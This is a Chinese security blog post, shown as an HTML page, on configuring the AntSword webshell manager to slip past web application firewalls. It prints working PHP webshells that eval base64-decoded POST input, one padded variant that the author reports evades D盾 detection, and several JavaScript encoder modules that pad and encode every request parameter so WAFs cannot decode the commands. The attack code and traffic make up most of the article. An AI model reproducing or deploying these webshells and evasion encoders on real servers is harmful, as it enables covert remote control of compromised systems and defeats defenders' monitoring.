<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="蚁剑自定义编码器和解码器来bypass waf, darkless,网络安全">
    <meta name="description" content="网络与信息安全博客">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>蚁剑自定义编码器和解码器来bypass waf | Darkless</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.3.0"><link rel="alternate" href="/atom.xml" title="Darkless" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Darkless</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories/web%E5%AE%89%E5%85%A8" class="waves-effect waves-light">
      
      <i class="fab fa-internet-explorer" style="zoom: 0.6;"></i>
      
      <span>Web安全</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8" class="waves-effect waves-light">
      
      <i class="fas fa-network-wired" style="zoom: 0.6;"></i>
      
      <span>网络安全</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories/%E8%B7%AF%E7%94%B1%E4%BA%A4%E6%8D%A2" class="waves-effect waves-light">
      
      <i class="fas fa-random" style="zoom: 0.6;"></i>
      
      <span>路由交换</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/my-docs" class="waves-effect waves-light">
      
      <i class="fas fa-book" style="zoom: 0.6;"></i>
      
      <span>Docs</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Darkless</div>
        <div class="logo-desc">
            
            网络与信息安全博客
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories/web%E5%AE%89%E5%85%A8" class="waves-effect waves-light">
			
			    <i class="fa-fw fab fa-internet-explorer"></i>
			
			Web安全
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-network-wired"></i>
			
			网络安全
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories/%E8%B7%AF%E7%94%B1%E4%BA%A4%E6%8D%A2" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-random"></i>
			
			路由交换
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/my-docs" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-book"></i>
			
			Docs
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://cdn.jsdelivr.net/gh/handbye/images/picgoimages.jpeg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">蚁剑自定义编码器和解码器来bypass waf</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/AntSword/">
                                <span class="chip bg-color">AntSword</span>
                            </a>
                        
                            <a href="/tags/%E8%9A%81%E5%89%91/">
                                <span class="chip bg-color">蚁剑</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/web%E5%AE%89%E5%85%A8/" class="post-category">
                                web安全
                            </a>
                        
                            <a href="/categories/web%E5%AE%89%E5%85%A8/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7/" class="post-category">
                                安全工具
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2020-05-19
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2020-06-07
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    3.2k
                </div>
                

                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>蚁剑和菜刀一样是一款优秀的webshell管理工具（shll控制端），与菜刀相比，蚁剑具有开源，自定义能力强，跨平台等优点。在waf普遍的今天，蚁剑这款工具提供了自定义header，自定义body，自定义编码器和解码器等功能来bypass waf，实在不行，如果你有NodeJs的开发能力，你还可以修改源代码来逃避waf的特征检测。学会使用这些功能，waf再也不是渗透测试中的拦路虎，当然连接马的前提是马儿必须免杀。</p>
<h2 id="修改蚁剑的UA"><a href="#修改蚁剑的UA" class="headerlink" title="修改蚁剑的UA"></a>修改蚁剑的UA</h2><p>你是否遇到过webshell已经上传成功，但使用蚁剑去连接时就是连接不上的情况呢？发生的原因绝大数是因为被waf拦截了，waf会检测常用的webshell连接工具的一些特征，比如User-Agent,遇到明显的UA特征肯定会拦截。下面是蚁剑默认的UA：</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2019%2014%2012%2018.png" alt="20200519141218"></p>
<p>太明显了，蚁剑多种方式可以修改User-Agent。</p>
<p>1.修改源代码</p>
<p>在项目路径<code>.modules/request.js</code>中进行修改:</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2019%2014%2022%2027.png" alt="20200519142227"></p>
<p>另外项目路径下的<code>.modules/update.js</code>也需要修改：</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2019%2014%2026%2048.png" alt="20200519142648"></p>
<p>2.为单独的webshell添加请求头</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2019%2014%2029%2002.png" alt="20200519142902"></p>
<p>3.全局设置中添加请求头</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2019%2014%2039%2036.png" alt="20200519143936"></p>
<h2 id="使用编码器"><a href="#使用编码器" class="headerlink" title="使用编码器"></a>使用编码器</h2><p>先说下蚁剑编码器的作用，当使用蚁剑控制webshell向服务器发送数据包时，数据包中的body部分会按照编码器中定义的规则进行编码或者加密后在发送，这样就可以避免有比较明显的命令执行特征从儿被WAF拦截。</p>
<p>先看下不使用编码器时，蚁剑是如何发包的，执行一个查看文件的操作，抓包观察：</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2019%2014%2059%2023.png" alt="20200519145923"></p>
<p>其中<code>l76cc4f5b31b36</code>是蚁剑随机生成的一个变量，其中的值是经过base64编码的，解码后为要查看的文件名：</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2019%2015%2001%2019.png" alt="20200519150119"></p>
<p>变量<code>test</code>为蚁剑连接webshell的密码，也就是 php <code>_POST</code>变量中接收数据的参数</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2019%2015%2004%2021.png" alt="20200519150421"></p>
<p>可以看到<code>test</code>后面的值都是明文的php代码，这样就很容易被waf检测到。</p>
<p>使用蚁剑自带的<code>base64</code>编码器连接抓包查看：</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2019%2016%2013%2042.png" alt="20200519161342"></p>
<p>相较不使用编码器多了一个参数<code>s4c932eb660f94</code>,这个参数测内容就是base64编码后的读取文件的php代码，然后使用参数<code>test</code>进行base64解码<code>s4c932eb660f94</code>中的内容发送给服务端进行执行。这种编码方式虽然编码了读取文件操作的代码，但是在body中还是会有明文的php代码，接下来我们改动下base64编码器，让请求的数据包中不再有明文的php代码。</p>
<h3 id="自定义一个编码器"><a href="#自定义一个编码器" class="headerlink" title="自定义一个编码器"></a>自定义一个编码器</h3><p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2019%2016%2025%2048.png" alt="20200519162548"></p>
<p>在这之前先了解下蚁剑的编码器规则：</p>
<pre class="line-numbers language-js" data-language="js"><code class="language-js"><span class="token comment">/**
 * php::base64编码器
 * Create at: 2020/05/19 16:35:59
 */</span>

<span class="token string">'use strict'</span><span class="token punctuation">;</span>

<span class="token comment">/*
* @param  &#123;String&#125; pwd   连接密码
* @param  &#123;Array&#125;  data  编码器处理前的 payload 数组
* @return &#123;Array&#125;  data  编码器处理后的 payload 数组
*/</span>
module<span class="token punctuation">.</span><span class="token function-variable function">exports</span> <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token parameter">pwd<span class="token punctuation">,</span> data<span class="token punctuation">,</span> ext<span class="token operator">=</span><span class="token punctuation">&#123;</span><span class="token punctuation">&#125;</span></span><span class="token punctuation">)</span> <span class="token operator">=></span> <span class="token punctuation">&#123;</span>
  <span class="token comment">// ##########    请在下方编写你自己的代码   ###################</span>
  <span class="token comment">// 以下代码为 PHP Base64 样例</span>

  <span class="token comment">// 生成一个随机变量名</span>
  <span class="token keyword">let</span> randomID <span class="token operator">=</span> <span class="token template-string"><span class="token template-punctuation string">`</span><span class="token string">_0x</span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">$&#123;</span>Math<span class="token punctuation">.</span><span class="token function">random</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">toString</span><span class="token punctuation">(</span><span class="token number">16</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">substr</span><span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">)</span><span class="token interpolation-punctuation punctuation">&#125;</span></span><span class="token template-punctuation string">`</span></span><span class="token punctuation">;</span>
  <span class="token comment">// 原有的 payload 在 data['_']中</span>
  <span class="token comment">// 取出来之后，转为 base64 编码并放入 randomID key 下</span>
  data<span class="token punctuation">[</span>randomID<span class="token punctuation">]</span> <span class="token operator">=</span> Buffer<span class="token punctuation">.</span><span class="token function">from</span><span class="token punctuation">(</span>data<span class="token punctuation">[</span><span class="token string">'_'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">toString</span><span class="token punctuation">(</span><span class="token string">'base64'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

  <span class="token comment">// shell 在接收到 payload 后，先处理 pwd 参数下的内容，</span>
  data<span class="token punctuation">[</span>pwd<span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token template-string"><span class="token template-punctuation string">`</span><span class="token string">eval(base64_decode($_POST[</span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">$&#123;</span>randomID<span class="token interpolation-punctuation punctuation">&#125;</span></span><span class="token string">]));</span><span class="token template-punctuation string">`</span></span><span class="token punctuation">;</span>

  <span class="token comment">// ##########    请在上方编写你自己的代码   ###################</span>

  <span class="token comment">// 删除 _ 原有的payload</span>
  <span class="token keyword">delete</span> data<span class="token punctuation">[</span><span class="token string">'_'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
  <span class="token comment">// 返回编码器处理后的 payload 数组</span>
  <span class="token keyword">return</span> data<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>上面的注释已经写的很清楚了，我们在自定义编码方式时只需要去修改<code>data[&#39;_&#39;]</code>中的内容就可以了，下面是我对默认编码器的修改：</p>
<pre class="line-numbers language-js" data-language="js"><code class="language-js"><span class="token comment">/**
 * php::base64编码器
 * Create at: 2020/05/19 16:57:59
 */</span>

<span class="token string">'use strict'</span><span class="token punctuation">;</span>

<span class="token comment">/*
* @param  &#123;String&#125; pwd   连接密码
* @param  &#123;Array&#125;  data  编码器处理前的 payload 数组
* @return &#123;Array&#125;  data  编码器处理后的 payload 数组
*/</span>
module<span class="token punctuation">.</span><span class="token function-variable function">exports</span> <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token parameter">pwd<span class="token punctuation">,</span> data<span class="token punctuation">,</span> ext<span class="token operator">=</span><span class="token punctuation">&#123;</span><span class="token punctuation">&#125;</span></span><span class="token punctuation">)</span> <span class="token operator">=></span> <span class="token punctuation">&#123;</span>
  <span class="token comment">// ##########    请在下方编写你自己的代码   ###################</span>
  <span class="token comment">// 以下代码为 PHP Base64 样例</span>

  data<span class="token punctuation">[</span>pwd<span class="token punctuation">]</span> <span class="token operator">=</span> Buffer<span class="token punctuation">.</span><span class="token function">from</span><span class="token punctuation">(</span>data<span class="token punctuation">[</span><span class="token string">'_'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">toString</span><span class="token punctuation">(</span><span class="token string">'base64'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

  <span class="token comment">// ##########    请在上方编写你自己的代码   ###################</span>

  <span class="token comment">// 删除 _ 原有的payload</span>
  <span class="token keyword">delete</span> data<span class="token punctuation">[</span><span class="token string">'_'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
  <span class="token comment">// 返回编码器处理后的 payload 数组</span>
  <span class="token keyword">return</span> data<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>由于上述的编码器没有自动解码传入的payload，所以需要在webshell中解码payload，将webshell改为如下的形式：</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> <span class="token keyword">eval</span><span class="token punctuation">(</span><span class="token function">base64_decode</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'test'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>抓包查看请求的数据包：</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2019%2017%2002%2055.png" alt="20200519170255"></p>
<p>请求包中的<code>test</code>参数也被base64编码，已经没有明文的php代码了。这样就实现了一个简单的编码器，但是这样的编码器并不能bypass waf，因为有些waf会对请求的数据进行base64解码，从而就发现了我们的payload。没关系，既然了解了编码器的原理，那我们就可以变幻出各种payload来绕过waf。</p>
<p>例如：</p>
<ul>
<li>为payload的base64编码后的数据前后添加几个字符串，让waf解码base64失败</li>
<li>先用rot13加密payload然后再base64编码</li>
<li>先用base64编码再使用hex编码</li>
</ul>
<p>总之，你可以天马行空，使用各种编码组合来伪装自己的payload，任由waf多强大，也不可能全部解密出payload。</p>
<p>下面就写一个自定义的编码器来绕过D盾：</p>
<pre class="line-numbers language-js" data-language="js"><code class="language-js"><span class="token string">'use strict'</span><span class="token punctuation">;</span>

<span class="token comment">/*
* @param  &#123;String&#125; pwd   连接密码
* @param  &#123;Array&#125;  data  编码器处理前的 payload 数组
* @return &#123;Array&#125;  data  编码器处理后的 payload 数组
*/</span>
module<span class="token punctuation">.</span><span class="token function-variable function">exports</span> <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token parameter">pwd<span class="token punctuation">,</span> data<span class="token punctuation">,</span> ext<span class="token operator">=</span><span class="token punctuation">&#123;</span><span class="token punctuation">&#125;</span></span><span class="token punctuation">)</span> <span class="token operator">=></span> <span class="token punctuation">&#123;</span>
  <span class="token comment">// ##########    请在下方编写你自己的代码   ###################</span>
  <span class="token comment">// 原有的 payload 在 data['_']中</span>
  <span class="token comment">// 取出来之后，转为 base64 编码并放入 randomID key 下</span>
  data<span class="token punctuation">[</span>pwd<span class="token punctuation">]</span> <span class="token operator">=</span> Buffer<span class="token punctuation">.</span><span class="token function">from</span><span class="token punctuation">(</span>data<span class="token punctuation">[</span><span class="token string">'_'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">toString</span><span class="token punctuation">(</span><span class="token string">'base64'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  
  <span class="token comment">//base64编码的前后再拼接随意定义的一个字符串</span>
  data<span class="token punctuation">[</span>pwd<span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token string">"lwk02nm"</span> <span class="token operator">+</span> data<span class="token punctuation">[</span>pwd<span class="token punctuation">]</span><span class="token punctuation">;</span>
  data<span class="token punctuation">[</span>pwd<span class="token punctuation">]</span> <span class="token operator">+=</span> <span class="token string">"lwk02nm"</span><span class="token punctuation">;</span>
  
  <span class="token comment">// ##########    请在上方编写你自己的代码   ###################</span>

  <span class="token comment">// 删除 _ 原有的payload</span>
  <span class="token keyword">delete</span> data<span class="token punctuation">[</span><span class="token string">'_'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
  <span class="token comment">// 返回编码器处理后的 payload 数组</span>
  <span class="token keyword">return</span> data<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>然后上传到服务器的webshell就需要写成下面这样：</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$st</span> <span class="token operator">=</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'test'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$sa</span> <span class="token operator">=</span> <span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'lwk02nm'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">''</span><span class="token punctuation">,</span><span class="token variable">$st</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">eval</span><span class="token punctuation">(</span><span class="token function">base64_decode</span><span class="token punctuation">(</span><span class="token variable">$sa</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<blockquote>
<p>令人意外的是上面的webshell尽然可以对D盾免杀，D盾只报了1级。</p>
</blockquote>
<p>抓包查看此编码器发给服务端的数据包：</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2020%2014%2047%2012.png" alt="20200520144712"></p>
<p>可看到的确在数据包前后添加了我们自定义的字符串，这样的话就可避免waf使用base64解码成功，但是webshell却可以正常处理payload。</p>
<p>下面验证下自定义的编码器能否bypass D盾：</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2021%2011%2013%2017.png" alt="20200521111317"></p>
<p>D盾将上传的webshell判断为1级，1级是可以免杀的，再结合我们的编码器就可以顺利byapss：</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2021%2011%2016%2029.png" alt="20200521111629"></p>
<h3 id="bypass命令执行"><a href="#bypass命令执行" class="headerlink" title="bypass命令执行"></a>bypass命令执行</h3><p>意外总是来的太快，使用上面的编码器确实可以使用蚁剑连接我们的webshell了，也可以查看目录下的文件，但确无法执行命令，每次命令执行都会被D盾拦截。</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2021%2012%2032%2058.png" alt="20200521123258"></p>
<p>抓包观察下发送的数据包：</p>
<p>可看到参数<code>kd8aa13e6949d3</code>的值还是base64编码，解码后的值为：<code>cd /d &quot;C:/phpstudy/PHPTutorial/WWW&quot;&amp;whoami&amp;echo [S]&amp;cd&amp;echo [E]</code>还是具有明显的特征会被waf拦截。</p>
<p>由于蚁剑只会对<code>data[pwd]</code>里面的参数按照设定的编码器编码，其它参数默认使用base64编码，所以其它参数一旦被waf解码还是会有明显的特征，从而导致被拦截。那有办法将全部的参数编码吗？在蚁剑的一个issue里，作者给出了解决办法，具体的请去<a target="_blank" rel="noopener" href="https://github.com/AntSwordProject/antSword/issues/185">这里</a>查看。</p>
<p><img src="https://cdn.jsdelivr.net/gh/handbye/images@master/upic/2020%2005%2021%2013%2044%2011.png" alt="20200521134411"></p>
<p>可以看到解决办法是遍历<code>data[_]</code>取出其中的值并将其全部编码,按照这种思路修改下上面写的编码器：</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token comment">/**
 * php::base64编码器
 * Create at: 2020/05/21 13:07:23
 */</span>

<span class="token string single-quoted-string">'use strict'</span><span class="token punctuation">;</span>

<span class="token comment">/*
* @param  &#123;String&#125; pwd   连接密码
* @param  &#123;Array&#125;  data  编码器处理前的 payload 数组
* @return &#123;Array&#125;  data  编码器处理后的 payload 数组
*/</span>
module<span class="token operator">.</span>exports <span class="token operator">=</span> <span class="token punctuation">(</span>pwd<span class="token punctuation">,</span> data<span class="token punctuation">)</span> <span class="token operator">=></span> <span class="token punctuation">&#123;</span>
  <span class="token comment">// ##########    请在下方编写你自己的代码   ###################</span>
  let ret <span class="token operator">=</span> <span class="token punctuation">&#123;</span><span class="token punctuation">&#125;</span><span class="token punctuation">;</span>
  <span class="token keyword">for</span> <span class="token punctuation">(</span>let <span class="token constant">_</span> in data<span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token constant">_</span> <span class="token operator">===</span> <span class="token string single-quoted-string">'_'</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> <span class="token keyword">continue</span> <span class="token punctuation">&#125;</span><span class="token punctuation">;</span>
    ret<span class="token punctuation">[</span><span class="token constant">_</span><span class="token punctuation">]</span> <span class="token operator">=</span> Buffer<span class="token operator">.</span><span class="token function">from</span><span class="token punctuation">(</span>data<span class="token punctuation">[</span><span class="token constant">_</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token function">toString</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'base64'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    ret<span class="token punctuation">[</span><span class="token constant">_</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'lwk02nm'</span> <span class="token operator">+</span> ret<span class="token punctuation">[</span><span class="token constant">_</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    ret<span class="token punctuation">[</span><span class="token constant">_</span><span class="token punctuation">]</span> <span class="token operator">+=</span> <span class="token string single-quoted-string">'lwk02nm'</span><span class="token punctuation">;</span>
  <span class="token punctuation">&#125;</span>
  ret<span class="token punctuation">[</span>pwd<span class="token punctuation">]</span> <span class="token operator">=</span> Buffer<span class="token operator">.</span><span class="token function">from</span><span class="token punctuation">(</span>data<span class="token punctuation">[</span><span class="token string single-quoted-string">'_'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token function">toString</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'base64'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  ret<span class="token punctuation">[</span>pwd<span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'lwk02nm'</span> <span class="token operator">+</span> ret<span class="token punctuation">[</span>pwd<span class="token punctuation">]</span><span class="token punctuation">;</span>
  ret<span class="token punctuation">[</span>pwd<span class="token punctuation">]</span> <span class="token operator">+=</span> <span class="token string single-quoted-string">'lwk02nm'</span><span class="token punctuation">;</span>
  <span class="token comment">// 返回编码器处理后的 payload 数组</span>
  <span class="token keyword">return</span> ret<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
